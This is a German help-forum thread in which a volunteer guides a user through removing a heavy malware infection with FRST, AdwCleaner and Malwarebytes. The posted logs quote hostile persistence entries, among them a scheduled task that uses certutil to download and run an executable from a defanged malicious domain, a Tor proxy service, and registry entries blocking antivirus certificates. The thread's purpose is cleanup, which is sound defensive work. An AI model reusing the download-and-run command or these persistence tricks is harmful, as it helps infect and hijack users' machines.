  2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Program Files\Common Files\5ZNAWZD2EL69
  2018-05-27 08:56 - 2018-05-27 08:56 - 000001285 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HowToRemove.lnk
  2018-05-27 08:56 - 2018-05-27 08:56 - 000000000 ____D C:\Users\Nico\AppData\LocalLow\AMD
  2018-05-26 14:03 - 2018-05-26 14:03 - 001592320 _____ C:\Windows\2045f4764aa9c27a5e23cd56fa5420a8.exe
  2018-05-26 14:03 - 2018-05-26 14:03 - 000039584 _____ C:\Windows\uninstaller.dat
  2018-05-25 12:23 - 2018-05-25 12:23 - 000000000 ___HD C:\Windows\msdownld.tmp
  2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
  2018-05-25 01:01 - 2018-05-25 01:01 - 000000184 ____H () C:\Program Files (x86)\Common Files\new.bat
  2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ () C:\Users\Nico\AppData\Local\agent.dat
  2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ () C:\Users\Nico\AppData\Local\Config.xml
  2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
  2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ () C:\Users\Nico\AppData\Local\Hottam.tst
  2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ () C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
  2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ () C:\Users\Nico\AppData\Local\installer.dat
  2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ () C:\Users\Nico\AppData\Local\Jaytip.bin
  2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ () C:\Users\Nico\AppData\Local\Main.dat
  2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ () C:\Users\Nico\AppData\Local\md.xml
  2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ () C:\Users\Nico\AppData\Local\noah.dat
  2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ () C:\Users\Nico\AppData\Local\pfialx.dll
  2018-02-05 20:57 - 2018-05-27 13:14 - 000007654 _____ () C:\Users\Nico\AppData\Local\Resmon.ResmonCfg
  2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ () C:\Users\Nico\AppData\Local\sham.db
  2018-05-27 10:47 - 2018-05-27 10:47 - 000032038 _____ () C:\Users\Nico\AppData\Local\uninstall_temp.ico
  2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ () C:\Users\Nico\AppData\Local\VoltFinlab.bin
  ShellIconOverlayIdentifiers: [{BFD98515-CD74-48A4-98E2-13D209E3EE4F}] -> {BFD98515-CD74-48A4-98E2-13D209E3EE4F} => C:\Windows\system32\mcicda64.dll [2018-03-24] ()
  C:\Windows\system32\mcicda64.dll
  Task: {099A856C-08D3-43C8-AD18-3D651763C816} - System32\Tasks\Social Software => C:\Windows\system32\rundll32.exe "C:\Program Files\Social Software\Social Software.dll",UjaAssDjw <==== ACHTUNG
  C:\Program Files\Social Software
  Task: {1622AF7B-53DD-4FEE-8BE9-907C9F57AA98} - System32\Tasks\SystemUpdate64 => C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [2018-05-27] (SystemaRev)
  C:\Program Files\SystemaRev
  Task: {1913E8F8-F8A7-47F0-A2D5-DF77C0226E3E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_FG => C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d\HandlerExecution.exe <==== ACHTUNG
  C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d
  Task: {28FB99D2-B4C3-4FD4-8949-3C860CE2DE24} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-05-27] () <==== ACHTUNG
  Task: {412B9FDA-8C4C-40F4-A23C-696805866F9C} - System32\Tasks\AncillaryFunctionauf => C:\Program Files (x86)\nodejs\node.exe
  C:\Program Files (x86)\nodejs
  Task: {42767FB3-1423-4F1B-8F31-8B5936FA8F06} - System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\HandlerExecution.exe <==== ACHTUNG
  C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
  Task: {478261E4-F178-4CD8-8575-B8ACE5A0769E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_AM => C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7\HandlerExecution.exe <==== ACHTUNG
  C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7
  Task: {6372E416-89E4-46ED-A9C3-6F1F6F797A15} - System32\Tasks\GoogleUpdateSecurityTaskMachine_NM => C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9\HandlerExecution.exe <==== ACHTUNG
  C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9
  Task: {66E7FCFF-AEE1-4593-AF28-7B81A60E82D7} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/4/app.exe C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ACHTUNG
  Task: {6E7DD5F8-0819-4296-8B92-EEA20358E2F3} - System32\Tasks\MainPMgr => powershell -ExecutionPolicy ByPass -File pm.ps1
  Task: {AB4D74FB-B89A-4A74-982B-76AE532F4F7F} - System32\Tasks\GoogleUpdateSecurityTaskMachine_OT => C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78\HandlerExecution.exe <==== ACHTUNG
  C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78
  Task: {BAD80BEE-7129-4A3C-B9FA-580ED44A6159} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe <==== ACHTUNG
  C:\Program Files\Reimage
  Task: {C6FD6CF5-A7E5-4DC3-A8A0-17D3A10CD175} - System32\Tasks\WindowsRecoveryCleaner => C:\ProgramData\Iostream.exe [2018-05-27] (Apple Inc.) <==== ACHTUNG
  C:\ProgramData\Iostream.exe
  ShortcutWithArgument: C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
  AlternateDataStreams: C:\ProgramData:NT [40]
  AlternateDataStreams: C:\ProgramData:NT2 [552]
  AlternateDataStreams: C:\Users\All Users:NT [40]
  AlternateDataStreams: C:\Users\All Users:NT2 [552]
  AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT [40]
  AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT2 [552]
  AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
  AlternateDataStreams: C:\ProgramData\Application Data:NT2 [552]
  AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40]
  AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [552]
  AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT [40]
  AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT2 [552]
  AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT [40]
  AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT2 [552]
  AlternateDataStreams: C:\Users\Public\AppData:CSM [472]
  Unlock: C:\Windows\system32\Drivers\etc\hosts
  C:\Windows\system32\Drivers\etc\hosts
  Hosts:
  VirusTotal: C:\Windows\system32\ntkrnlmp.exe
  VirusTotal: C:\Windows\system32\osloader.exe
  VirusTotal: C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe
  Folder: C:\Windows\rss
  ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
  RemoveProxy:
  CMD: ipconfig /flushdns
  CMD: netsh winsock reset
  EmptyTemp:
  End::
           

• Starte nun FRST und klicke direkt den Entfernen Button. Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
• Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich die FRST/FRST64.exe befindet.
• Gegebenenfalls muss dein Rechner dafür neu gestartet werden.
• Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.

Schritt 2
Downloade Dir bitte AdwCleaner auf deinen Desktop (Bebilderte Anleitung).

• Schließe alle offenen Programme und Browser.
• Starte die adwcleaner.exe mit einem Doppelklick.
• Stimme den Nutzungsbedingungen zu.
• Klicke auf Einstellungen, scrolle nach unten und vergewissere dich, dass die folgenden Punkte ausgewählt sind:
  • IFEO-Schlüssel löschen
  • Firewall wiederherstellen
  • Tracing Schlüssel löschen
  • Prefetch-Dateien löschen
  • BITS wiederherstellen
  • Proxy wiederherstellen
  • IE-Policies wiederherstellen
  • Chrome-Policies wiederherstellen
  • Winsock wiederherstellen
• Klicke nun auf Dashboard, dann auf Jetzt scannen und warte bis der Suchlauf abgeschlossen ist.
• Klicke nun auf Bereinigen & Reparieren und bestätige mit Jetzt bereinigen.
  
• WICHTIG:
  Sollte AdwCleaner nichts finden, klicke auf Grundlegende Reparatur ausführen und anschließend auf Jetzt bereinigen.
• Nach dem Neustart öffnet sich AdwCleaner automatisch. Klicke auf Log-Datei ansehen.
• Poste mir deren Inhalt der Log-Datei mit deiner nächsten Antwort.
• Die Logdatei findest du auch unter C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt. (xx = fortlaufende Nummer).

Schritt 3
Downloade Dir bitte Malwarebytes Anti-Malware 3 (Bebilderte Anleitung)

• Installiere das Programm in den vorgegebenen Pfad.
• Starte Malwarebytes' Anti-Malware (MBAM).
• Klicke im Anschluss auf Scan, wähle den Bedrohungs-Scan aus und klicke auf Scan starten.
• Lass am Ende des Suchlaufs alle Funde (falls vorhanden) in die Quarantäne verschieben. Klicke dazu auf Ausgewählte Elemente in die Quarantäne verschieben.
• Lass deinen Rechner ggf. neu starten, um die Bereinigung abzuschließen.
• Starte MBAM nach dem Neustart, klicke auf Berichte.
• Wähle den neuesten Scan-Bericht aus, klicke auf Bericht anzeigen und dann auf Export.
• Wähle Textdatei (.txt) aus und speichere die Datei als mbam.txt auf dem Desktop ab.
• Füge den Inhalt der mbam.txt mit deiner nächsten Antwort hinzu.

Schritt 4

• Starte die FRST.exe erneut. Vergewissere dich, dass vor Addition.txt ein Haken gesetzt ist und drücke auf Untersuchen.
• FRST erstellt wieder zwei Logdateien (FRST.txt und Addition.txt).
• Poste mir beide Logdateien mit deiner nächsten Antwort.

Bitte poste mit deiner nächsten Antwort

• die Logdatei des FRST-Fix,
• die Logdatei von AdwCleaner,
• die Logdatei von MBAM,
• die zwei neuen Logdateien von FRST.

Mein PC ist so gut wie unbesiegbar, die maus ruckelt unvorstellbar stark, Programme brauchen mehrere Minuten bis sie sich öffnen oder reagieren.

Ich Frage mich ob es nicht mehr Sinn macht den PC neu aufzusetzen. Wichtige Daten hab ich gespeichert (extern) also habe ich kein Problem mit Datenverlust

Wenn ich die Schritte mit dem momentanen Zustand durchführen soll/muss dann brauche ich dafür womöglich 1 ganzen Tag wenn nicht sogar noch länger. Neu aufsetzen dauert ca einen halben Tag. Soll ich die Schritte durchführen oder neu aufsetzen?

nein nicht so schnell aufgeben!! ich hab schon ganz viel popcorn für diesen Thread!

Bitte lass diesen Rechner von MKDB reinigen!

Also gut :/

"unbesiegbar" sollte übrigens "unbedienbar" heißen.

Ab Schritt 2 war er wieder einigermaßen bedienbar ^^.

Beim Neustart kam diese Nachricht C:/Users/1/AppData/Local/Temp/161131Log.iniis lost

Was soll mir das sagen? (die meldung kommt von "AsusSetup", mein Mainboard ist von Asus also gehe ich mal davon aus, dass die Datei wichtig ist.)

Wenn ich richtig gezählt habe waren es insgesamt 254 Funde oder wie auch immer man Das nennt.

Danke schonmal

Damit alle die Logfiles lesen und auswerten können:

Lesestoff:
Posten in CODE-Tags
Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR oder 7Z-Archiv zu packen erschwert mir massiv die Arbeit.
Auch wenn die Logs für einen Beitrag zu groß sein sollten, bitte ich dich die Logs direkt und notfalls über mehrere Beiträge verteilt zu posten.
Um die Logfiles in eine CODE-Box zu stellen gehe so vor:

• Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
• Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
• Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
• Klicke auf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.

Fixlog:

Code: Alles auswählenAufklappen

ATTFilter

Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01
durchgeführt von Nico (31-05-2018 14:13:17) Run:1
Gestartet von C:\Users\Nico\Downloads
Geladene Profile: Nico (Verfügbare Profile: Nico)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
CloseProcesses:
HKLM\...\Run: [resolve_run] => C:\Program Files (x86)\Common Files\new.bat [184 2018-05-25] ()
C:\Program Files (x86)\Common Files\new.bat
HKLM\...\Policies\Explorer\Run: [Chrome Update Helper] => C:\Users\Nico\AppData\Local\Temp\dx10r.exe
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ACHTUNG
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ACHTUNG
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ACHTUNG
HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ACHTUNG
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ACHTUNG
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ACHTUNG
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ACHTUNG
HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== ACHTUNG
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ACHTUNG
HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ACHTUNG
HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ACHTUNG
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ACHTUNG
HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ACHTUNG
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ACHTUNG
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ACHTUNG
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ACHTUNG
HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ACHTUNG
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ACHTUNG
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [muV82mBJud.exe] => C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69\muV82mBJud.exe [394240 2018-05-27] ()
C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [PLRFCKFE44692QO] => "C:\Program Files\RDH9TH3UTU\RDH9TH3UT.exe"
C:\Program Files\RDH9TH3UTU
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [2196509] => "C:\Users\Nico\AppData\Roaming\okdd3kogot1\xc1a5n52rpd.exe" /VERYSILENT
C:\Users\Nico\AppData\Roaming\okdd3kogot1
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [A4UX3F695ZAIC7C] => "C:\Program Files (x86)\eu0vb4pykb5\7CSH7.exe"
C:\Program Files (x86)\eu0vb4pykb5
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [flosdx] => rundll32.exe "C:\Users\Nico\AppData\Local\pfialx.dll",flosdx <==== ACHTUNG
C:\Users\Nico\AppData\Local\pfialx.dll
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [KDY06ILDW1UEHVJ] => "C:\Program Files\I88TDHYW3R\I88TDHYW3.exe"
C:\Program Files\I88TDHYW3R
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [PatientSunset] => C:\Windows\rss\csrss.exe [3188736 2018-05-27] () <==== ACHTUNG
C:\Windows\rss\csrss.exe
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [QIJFFKRURZ.exe] => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\QIJFFKRURZ.exe 
C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [CloudNet] => C:\Users\Nico\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-05-28] (EpicNet Inc.)
C:\Users\Nico\AppData\Roaming\EpicNet Inc
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\MountPoints2: {21cfe5ef-f3b0-11e7-bf9c-10c37b6f5940} - E:\HiSuiteDownLoader.exe
ShellExecuteHooks: Kein Name - {BFD98515-CD74-48A4-98E2-13D209E3EE4F} - C:\Windows\System32\mcicda64.dll [2990080 2018-03-24] ()
GroupPolicy: Beschränkung - Chrome <==== ACHTUNG
CHR HKLM\SOFTWARE\Policies\Google: Beschränkung <==== ACHTUNG
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.de/?gws_rd=ssl
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = 
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> DefaultScope {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.wupuf.com/?f=4&a=wbf_coinisre_18_21_18&cd=2XzuyEtN2Y1L1QzutCtD0CtAyB0ByC0FyDzyyEtDtCtB0AtAtN0D0Tzu0StBtAtAzztN1L2XzuyEtFtByEtFtDtFzyzytN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StAyByE0EtAyC0FyEtGyBtAtDzytGyBtA0EtCtGyEtDtBtDtG0D0FtD0BtD0CtDyCzz0BtA0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1StBzzzy1PtAyB1TtG1StA1Q1TtGyE1RtCtCtG1SzyyD1StG1O1QzyzzzytAzytDtB1S1PyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCyByEtAyBtN1Q2Z1B1P1RzutCyDtByByEtDyEtCzzzz&cr=1152795906&ir=&uref=IE&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.wupuf.com/?f=4&a=wbf_coinisre_18_21_18&cd=2XzuyEtN2Y1L1QzutCtD0CtAyB0ByC0FyDzyyEtDtCtB0AtAtN0D0Tzu0StBtAtAzztN1L2XzuyEtFtByEtFtDtFzyzytN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StAyByE0EtAyC0FyEtGyBtAtDzytGyBtA0EtCtGyEtDtBtDtG0D0FtD0BtD0CtDyCzz0BtA0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1StBzzzy1PtAyB1TtG1StA1Q1TtGyE1RtCtCtG1SzyyD1StG1O1QzyzzzytAzytDtB1S1PyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCyByEtAyBtN1Q2Z1B1P1RzutCyDtByByEtDyEtCzzzz&cr=1152795906&ir=&uref=IE&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
FF HKLM\...\Firefox\Extensions: [{2DE791A8-8C99-44DF-9976-CEACCA8FE024}] - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi
C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}
FF Extension: ( ) - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi [2018-05-27]
FF HKLM-x32\...\Firefox\Extensions: [{2DE791A8-8C99-44DF-9976-CEACCA8FE024}] - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\secure_cert.js [2018-05-27]
R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2018-05-27] () [Datei ist nicht signiert] <==== ACHTUNG
C:\ProgramData\Logic Cramble
R2 MicroService; C:\Users\Nico\AppData\Local\XService\XService.dll [585216 2018-05-27] () [Datei ist nicht signiert]
C:\Users\Nico\AppData\Local\XService
S3 SystemUpdate64; C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [593920 2018-05-27] (SystemaRev) [Datei ist nicht signiert]
C:\Program Files\SystemaRev
R2 winamgr; C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe [10644480 2018-05-28] (Microsoft Corporation) [Datei ist nicht signiert] <==== ACHTUNG
R2 WinDefender; C:\Windows\windefender.exe [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
Unlock: C:\Windows\windefender.exe
C:\Windows\windefender.exe
R2 848d0b10145f615d9a5315f9c7921103; rundll32.exe C:\Windows\qcusolizqbhuglpw.qcus QEl [X]
C:\Windows\qcusolizqbhuglpw.qcus
S3 aspnet_state; %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [X]
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [X]
S2 Nettrans; C:\ProgramData\PrefsSecure\Nettrans.exe [X] <==== ACHTUNG
C:\ProgramData\PrefsSecure
S2 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [X] <==== ACHTUNG
C:\Program Files (x86)\ProxyGate
R2 TCPSvc; "C:\Users\Nico\AppData\Local\Temp\csrss\proxy\tor.exe" --nt-service -f "C:\Users\Nico\AppData\Local\Temp\csrss\proxy\config" --Log "notice file C:\Users\Nico\AppData\Local\Temp\csrss\proxy\t" <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\csrss
S2 WNetworkMgmt; "C:\ProgramData\Microsoft\Windows\WNetworkMgmt\WNetworkMgmt.exe"  [X]
C:\ProgramData\Microsoft\Windows\WNetworkMgmt
S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
